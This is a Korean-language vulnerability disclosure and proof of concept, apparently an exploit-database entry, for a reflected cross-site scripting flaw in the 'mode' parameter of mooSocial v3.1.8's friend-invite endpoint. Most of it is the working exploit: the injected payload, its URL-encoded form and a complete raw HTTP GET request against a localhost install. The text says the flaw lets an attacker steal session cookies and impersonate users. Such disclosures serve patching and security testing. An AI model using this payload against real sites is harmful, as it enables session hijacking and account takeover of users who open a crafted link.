
mooSocial v3.1.8은 친구 초대 기능에서 크로스 사이트 스크립팅에 취약합니다.
mooSocial v3.1.8의 친구 초대 기능에 있는 mode 매개변수에서 발견된 반사형 교차 사이트 스크립팅(XSS) 취약점으로, 공격자가 조작된 URL을 통해 사용자의 세션 쿠키를 탈취하고 계정을 가장할 수 있습니다.
취약한 매개변수: mode
Payload : ');alert(1)//
FINAL Payload (URL encoded) : %27)%3balert(1)%2f%2f
다음 경로에 대한 GET 요청: [/moosocial/friends/ajax_invite?mode=] :
GET /moosocial/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;' HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: 19edc47bb57545288d88183ca75c9a0bmooSocial[activity_feed]=Q2FrZQ%3D%3D.7R9bpposmi8%3D
Connection: close
